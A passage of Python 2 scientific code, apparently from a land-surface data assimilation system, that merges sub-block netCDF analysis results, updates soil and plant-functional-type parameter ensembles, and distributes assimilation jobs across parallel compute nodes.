print "Write NC_File_Out_Assimilation_2_Initial.nc"
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r+')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r+')
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r+')
Parameter_Soil_Space_Ensemble = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:, :, :, :]
Parameter_Soil_Space_parm_infl = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_parm_infl'][:, :, :]
Analysis_Grid_Array = NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:, :, :, :]
for Block_Index in range(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col):
print "Block_Index",Block_Index
Sub_Block_Row_Start = Sub_Block_Row_Start_Array[Block_Index]
Sub_Block_Row_End = Sub_Block_Row_End_Array[Block_Index]
Sub_Block_Col_Start = Sub_Block_Col_Start_Array[Block_Index]
Sub_Block_Col_End = Sub_Block_Col_End_Array[Block_Index]
NC_FileName_Out_Block = DAS_Output_Path+"Analysis/"+Region_Name+"/Block_Assim_"+str(Block_Index+1)+".nc"
NC_File_Out_Block = netCDF4.Dataset(NC_FileName_Out_Block, 'r')
Analysis_Grid[Prop_Grid_Array_Sys_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Analysis_Grid'][:,:]
Localization_Map_Mask[Prop_Grid_Array_Sys_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Localization_Map_Mask'][:,:]
Parameter_Soil_Space_Ensemble[:, :, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Parameter_Soil_Space_Ensemble'][:,:,:,:]
Parameter_Soil_Space_parm_infl[:, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Parameter_Soil_Space_parm_infl'][:,:,:]
Analysis_Grid_Array[:, Prop_Grid_Array_Sys_Index, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Analysis_Grid_Array'][:,Prop_Grid_Array_Sys_Index,:,:]
NC_File_Out_Block.close()
NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:, :, :, :] = Parameter_Soil_Space_Ensemble
NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_parm_infl'][:, :, :] = Parameter_Soil_Space_parm_infl
NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:, Prop_Grid_Array_Sys_Index, :, :] = Analysis_Grid_Array[:, Prop_Grid_Array_Sys_Index, :, :]
del Parameter_Soil_Space_Ensemble,Parameter_Soil_Space_parm_infl,Analysis_Grid_Array
NC_File_Out_Assimilation_2_Initial.sync()
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Parameter.sync()
NC_File_Out_Assimilation_2_Parameter.close()
NC_File_Out_Assimilation_2_Diagnostic.sync()
NC_File_Out_Assimilation_2_Diagnostic.close()
#------------------------------------------Finish Assimilation
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
Observation_Matrix_Copy = numpy.copy(Observation_Matrix[Observation_Matrix_Index,::])
Observation_Matrix_Copy = numpy.ma.masked_where(Observation_Matrix_Copy == NAvalue, Observation_Matrix_Copy)
Analysis_Grid_Temp = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], Analysis_Grid[Prop_Grid_Array_Sys_Index,::])
Analysis_Grid_Temp = numpy.ma.masked_where(Analysis_Grid_Temp == NAvalue, Analysis_Grid_Temp)
Model_State = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], numpy.mean(NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, Prop_Grid_Array_Sys_Index, :, :],axis=0))
ObsModel_Mat_Copy = numpy.ma.masked_where(Observation_Matrix_Copy == NAvalue, ObsModel_Mat)
NC_File_Out_Assimilation_2_Initial_Copy.close()
if Def_Print:
print "numpy.shape(Analysis_Grid_Temp),numpy.shape(Model_State)",numpy.shape(Analysis_Grid_Temp),numpy.shape(Model_State)
print "Min Observation Value is:", Observation_Matrix_Copy.min(), "Maximum Observation Value is:", Observation_Matrix_Copy.max()
print "Min Model_State Value is:", Model_State.min(), "Maximum Model_State Value is:", Model_State.max()
print "Min Analysis_Grid Value is:", Analysis_Grid_Temp.min(), "Maximum Analysis_Grid Value is:", Analysis_Grid_Temp.max()
print "Analysis Mean is:", numpy.mean(Analysis_Grid_Temp), "Model Ensemble Mean is:", numpy.mean(Model_State), "(Analysis - Model_State) Mean is:", numpy.mean(Analysis_Grid_Temp.flatten() - Model_State.flatten())
print "ObsModel_Mat Mean is:", numpy.mean(ObsModel_Mat_Copy),"Observation Mean is:", numpy.mean(Observation_Matrix_Copy), "(ObsModel_Mat - Observation) Mean is:", numpy.mean(ObsModel_Mat.flatten() - Observation_Matrix_Copy.flatten())
if Def_Print:
print "******************************************************** Station Statistics"
for Station_Index in range(numpy.size(Station_XY)/2):
print "Station_"+str(Station_Index+1),"Analysis:",Analysis_Grid_Temp[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Model Value:",Model_State[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Observation_Value:",Observation_Matrix_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
print "ObsModel_Variance:",ObsModel_Variance_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"ObsModel:",ObsModel_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
del Observation_Matrix_Copy,Analysis_Grid_Temp,Model_State,ObsModel_Mat_Copy
else:
print "############################## Wrong Parameter_Optimization Value, Should be 1 or 2"
os.abort()
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r+')
NC_File_Out_Assimilation_2_Parameter_Obs_Dim = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter_Obs_Dim, 'r+')
NC_File_Out_Assimilation_2_Parameter_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter_Copy, 'r')
if Def_Print:
Parameter_Soil_Space_Ensemble = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:, :, :,:]
Parameter_Soil_Space_Ensemble_Copy = NC_File_Out_Assimilation_2_Parameter_Copy.variables['Parameter_Soil_Space_Ensemble'][:, :, :,:]
print "******************************************************** Station Statistics"
for Station_Index in range(numpy.size(Station_XY)/2):
print "-------------------------------------------Results of Station_"+str(Station_Index+1)
Par_Index_Sub = 0
for Par_Index in range(Dim_Soil_Par):
if Soil_Par_Sens[Par_Index]:
print "Soil_Par_Sens[Par_Index]",Par_Index
print "Parameter_Soil_Space_Ensemble_Copy:",numpy.mean(Parameter_Soil_Space_Ensemble_Copy[:, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0), \
"Parameter_Soil_Space_Ensemble:",numpy.mean(Parameter_Soil_Space_Ensemble[:, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0)
if msw_infl < 0.0:
print "Parameter_Soil_Space_parm_infl_Copy:",numpy.mean(NC_File_Out_Assimilation_2_Parameter_Copy.variables['Parameter_Soil_Space_parm_infl'][Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0), \
"Parameter_Soil_Space_parm_infl:",numpy.mean(NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_parm_infl'][Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0)
Prop_Grid_Array_Sys_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, :, :, :]
Prop_Grid_Array_H_Trans = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_H_Trans'][:, :, :, :]
Analysis_Grid_Array = NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:,:,:,:]
for Ens_Index in range(Ensemble_Number):
SysModel_Mat_Ens = Prop_Grid_Array_Sys_Copy[Ens_Index, Prop_Grid_Array_Sys_Index, :, :]
ObsModel_Mat_Ens = Prop_Grid_Array_H_Trans[Ens_Index, Prop_Grid_Array_Sys_Index, :, :]
print "Ens_Index",Ens_Index,"Parameter_Soil_Space_Ensemble_Copy:",Parameter_Soil_Space_Ensemble_Copy[Ens_Index, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"Parameter_Soil_Space_Ensemble:",Parameter_Soil_Space_Ensemble[Ens_Index, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"SysModel:",SysModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"ObsModel:",ObsModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Analysis:",Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
del SysModel_Mat_Ens,ObsModel_Mat_Ens
del Prop_Grid_Array_Sys_Copy,Prop_Grid_Array_H_Trans,Analysis_Grid_Array
Par_Index_Sub += 1
del Parameter_Soil_Space_Ensemble,Parameter_Soil_Space_Ensemble_Copy
for Dim_Soil_Par_Index in range(Dim_Soil_Par):
#print numpy.shape(Parameter_Soil_Space_Ensemble_Obs_Dim[:,Dim_Soil_Par_Index,:,:]),numpy.shape(Parameter_Soil_Space_Ensemble_Temp_Copy[:,Dim_Soil_Par_Index,:,:])
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Obs_Dim'][:,Dim_Soil_Par_Index,:,:] += NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:,Dim_Soil_Par_Index,:,:]
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Initial_Copy.close()
NC_File_Out_Assimilation_2_Diagnostic.close()
NC_File_Out_Assimilation_2_Parameter.close()
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.close()
NC_File_Out_Assimilation_2_Parameter_Copy.close()
Soil_Par_Sens_Dim = 0
Veg_Par_Sens_Dim = 0
PFT_Par_Sens_Dim = numpy.size(numpy.where(PFT_Par_Sens == True))
Hard_Par_Sens_Dim = 0
if PFT_Par_Sens_Dim >= 1:
PFT_Par_Accum_Dim = PFT_Par_Accum_Dim + 1
Optimized_Parameter_Index[2] = Optimized_Parameter_Index[2] + 1
print "**********************************************************************Optimize PFT Parameter"
if Parameter_Optimization == 2:
print "############################## Parameter Estimation using Augmentation"
Parameter_Optimization_Flag = 1
if Def_PP and (not PDAF_Assim_Framework == 2) and (Sub_Block_Ratio_Row*Sub_Block_Ratio_Col) > 1 and len(active_nodes_server) > 1:
print "********************************************** Using PP to Accelerate Block_Assim"
Job_Num_Per_Node = int(numpy.ceil(float(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col) / len(active_nodes_server)))
print "The following submits",Job_Num_Per_Node,"jobs on each node and then retrieves the results"
if Job_Num_Per_Node == 0:
Job_Num_Per_Node = 1
job_server_node_results = []
job_server_node_results_wise = [[] for i in range(len(active_nodes_server))]
# The following submits 1 job to 1 node and then retrieves the results
print "+++++++++++++++++ The following submits",Job_Num_Per_Node,"jobs to 1 node and then retrieves the results"
Block_Index = 0
Node_Status = numpy.zeros(len(active_nodes_server),dtype=numpy.bool)
Node_Status[:] = True
while Block_Index < Sub_Block_Ratio_Row*Sub_Block_Ratio_Col:
if numpy.size(numpy.where(Node_Status==True)) > 0:
Node_Index = numpy.where(Node_Status==True)[0][0]
print "***********************Node_Index",Node_Index,"Block_Index",Block_Index,"is submitted!"
job_server_node = job_server_node_array[numpy.min([Node_Index*len(job_server_node_array)/len(active_nodes_server),len(job_server_node_array)-1])]
job_server_node_results.append(job_server_node.submit(Block_Assim, args=(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs[Prop_Grid_Array_Sys_Index], eps, msw_infl, Post_Inflation_Alpha_Par, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
Observation_Corelation_Par, Bias_Estimation_Option_Model_Par, Bias_Estimation_Option_Obs_Par, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path),
depfuncs=(CLM_Assim_Common, Check_Outliers, ParFor_PFT, ParFor_PFT_Block_Assim, ParFor_Fusion, ParFor_H_Operator, ParFor_Texture_Check, ParFor_Check_Outliers, ParFor_Check_Outliers_NA),
modules=("numpy", "netCDF4", "sys", "os", "re", "gc", "imp", "unittest", "time", "datetime", "shutil", "fnmatch", "subprocess", "string", "socket", "getpass", "calendar", "glob","scipy.stats",'scipy.weave'), group='Block_Assim'))
job_server_node_results_wise[Node_Index] = job_server_node_results[Block_Index]
Node_Status[Node_Index] = False
Block_Index = Block_Index + 1
if Block_Index >= len(active_nodes_server):
for job in job_server_node_results_wise:
if job != [] and job.finished:
Node_Index = job_server_node_results_wise.index(job)
print "*********************************************************************Node_Index",Node_Index,"is finished!"
Node_Status[Node_Index] = True
job_server_node_results_wise[Node_Index] = []
for job_server_node in job_server_node_array:
job_server_node.wait()
if Def_Print >= 2:
job_server_node.print_stats()
if Def_Print:
if len(job_server_node_results) > 0:
for job in job_server_node_results:
job_index = job_server_node_results.index(job)
if job_index > (Ensemble_Number - 1):
break
print "Results of ",job_index,"is", job()
else:
print "********* Run Block_Assim Sequentially"
if PDAF_Assim_Framework == 2:
DAS_Driver_Common.Stop_ppserver(mpi4py_rank, Def_PP, DAS_Depends_Path, job_server_node_array, NSLOTS, DasPy_Path, active_nodes_server, PP_Servers_Per_Node)
for Block_Index in range(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col):
Block_Assim(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs[Prop_Grid_Array_Sys_Index], eps, msw_infl, Post_Inflation_Alpha_Par, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
Observation_Corelation_Par, Bias_Estimation_Option_Model_Par, Bias_Estimation_Option_Obs_Par, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path, octave, r)
print "Write NC_File_Out_Assimilation_2_Initial.nc"
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r+')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r+')
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r+')
Parameter_PFT_Space_Ensemble = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:,:,:,:]
Parameter_PFT_Space_parm_infl = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_parm_infl'][:,:,:]
Analysis_Grid_Array = NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:, :, :, :]
for Block_Index in range(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col):
print "Block_Index",Block_Index
Sub_Block_Row_Start = Sub_Block_Row_Start_Array[Block_Index]
Sub_Block_Row_End = Sub_Block_Row_End_Array[Block_Index]
Sub_Block_Col_Start = Sub_Block_Col_Start_Array[Block_Index]
Sub_Block_Col_End = Sub_Block_Col_End_Array[Block_Index]
NC_FileName_Out_Block = DAS_Output_Path+"Analysis/"+Region_Name+"/Block_Assim_"+str(Block_Index+1)+".nc"
NC_File_Out_Block = netCDF4.Dataset(NC_FileName_Out_Block, 'r')
Analysis_Grid[Prop_Grid_Array_Sys_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Analysis_Grid'][:,:]
Localization_Map_Mask[Prop_Grid_Array_Sys_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Localization_Map_Mask'][:,:]
Parameter_PFT_Space_Ensemble[:,:,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Parameter_PFT_Space_Ensemble'][:,:,:,:]
Parameter_PFT_Space_parm_infl[:,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Parameter_PFT_Space_parm_infl'][:,:,:]
Analysis_Grid_Array[:, Prop_Grid_Array_Sys_Index, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Analysis_Grid_Array'][:,Prop_Grid_Array_Sys_Index,:,:]
NC_File_Out_Block.close()
NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:,:,:,:] = Parameter_PFT_Space_Ensemble
NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_parm_infl'][:,:,:] = Parameter_PFT_Space_parm_infl
NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:, Prop_Grid_Array_Sys_Index, :, :] = Analysis_Grid_Array[:, Prop_Grid_Array_Sys_Index, :, :]
del Parameter_PFT_Space_Ensemble,Parameter_PFT_Space_parm_infl,Analysis_Grid_Array
NC_File_Out_Assimilation_2_Initial.sync()
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Diagnostic.sync()
NC_File_Out_Assimilation_2_Diagnostic.close()
NC_File_Out_Assimilation_2_Parameter.sync()
NC_File_Out_Assimilation_2_Parameter.close()
#------------------------------------------Finish Assimilation
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
Observation_Matrix_Copy = numpy.copy(Observation_Matrix[Observation_Matrix_Index,::])
Observation_Matrix_Copy = numpy.ma.masked_where(Observation_Matrix_Copy == NAvalue, Observation_Matrix_Copy)
Analysis_Grid_Temp = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], Analysis_Grid[Prop_Grid_Array_Sys_Index,::])
Analysis_Grid_Temp = numpy.ma.masked_where(Analysis_Grid_Temp == NAvalue, Analysis_Grid_Temp)
Model_State = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], numpy.mean(NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, Prop_Grid_Array_Sys_Index, :, :],axis=0))
ObsModel_Mat_Copy = numpy.ma.masked_where(Observation_Matrix_Copy == NAvalue, ObsModel_Mat)
NC_File_Out_Assimilation_2_Initial_Copy.close()
if Def_Print:
print "numpy.shape(Analysis_Grid_Temp),numpy.shape(Model_State)",numpy.shape(Analysis_Grid_Temp),numpy.shape(Model_State)
print "Min Observation Value is:", Observation_Matrix_Copy.min(), "Maximum Observation Value is:", Observation_Matrix_Copy.max()
print "Min Model_State Value is:", Model_State.min(), "Maximum Model_State Value is:", Model_State.max()
print "Min Analysis_Grid Value is:", Analysis_Grid_Temp.min(), "Maximum Analysis_Grid Value is:", Analysis_Grid_Temp.max()
print "Analysis Mean is:", numpy.mean(Analysis_Grid_Temp), "Model Ensemble Mean is:", numpy.mean(Model_State), "(Analysis - Model_State) Mean is:", numpy.mean(Analysis_Grid_Temp.flatten() - Model_State.flatten())
print "ObsModel_Mat Mean is:", numpy.mean(ObsModel_Mat_Copy),"Observation Mean is:", numpy.mean(Observation_Matrix_Copy), "(ObsModel_Mat - Observation) Mean is:", numpy.mean(ObsModel_Mat.flatten() - Observation_Matrix_Copy.flatten())
if Def_Print:
print "******************************************************** Station Statistics"
for Station_Index in range(numpy.size(Station_XY)/2):
print "Station_"+str(Station_Index+1),"Analysis:",Analysis_Grid_Temp[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Model Value:",Model_State[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Observation_Value:",Observation_Matrix_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
print "ObsModel_Variance:",ObsModel_Variance_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"ObsModel:",ObsModel_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
del Observation_Matrix_Copy,Analysis_Grid_Temp,Model_State,ObsModel_Mat_Copy
else:
print "############################## Wrong Parameter_Optimization Value, Should be 1 or 2"
os.abort()
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r+')
NC_File_Out_Assimilation_2_Parameter_Obs_Dim = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter_Obs_Dim, 'r+')
NC_File_Out_Assimilation_2_Parameter_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter_Copy, 'r')
if Def_Print:
print "******************************************************** Station Statistics"
for Station_Index in range(numpy.size(Station_XY)/2):
print "-------------------------------------------Results of Station_"+str(Station_Index+1)
Par_Index_Sub = 0
for Par_Index in range(Dim_PFT_Par):
if PFT_Par_Sens[Par_Index]:
print "PFT_Par_Sens[Par_Index]",Par_Index
print "Parameter_PFT_Space_Ensemble_Copy:",numpy.mean(NC_File_Out_Assimilation_2_Parameter_Copy.variables['Parameter_PFT_Space_Ensemble'][:, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0), \
"Parameter_PFT_Space_Ensemble:",numpy.mean(NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0)
if msw_infl < 0.0:
print "Parameter_PFT_Space_parm_infl_Copy:",numpy.mean(NC_File_Out_Assimilation_2_Parameter_Copy.variables['Parameter_PFT_Space_parm_infl'][Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0), \
"Parameter_PFT_Space_parm_infl:",numpy.mean(NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_parm_infl'][Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]], axis=0)
Prop_Grid_Array_Sys_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, :, :, :]
Prop_Grid_Array_H_Trans = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_H_Trans'][:, :, :, :]
Parameter_PFT_Space_Ensemble_Copy = NC_File_Out_Assimilation_2_Parameter_Copy.variables['Parameter_PFT_Space_Ensemble'][:, :, :, :]
Parameter_PFT_Space_Ensemble = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:, :, :,:]
Analysis_Grid_Array = NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:,:,:,:]
for Ens_Index in range(Ensemble_Number):
SysModel_Mat_Ens = Prop_Grid_Array_Sys_Copy[Ens_Index, Prop_Grid_Array_Sys_Index, :, :]
ObsModel_Mat_Ens = Prop_Grid_Array_H_Trans[Ens_Index, Prop_Grid_Array_Sys_Index, :, :]
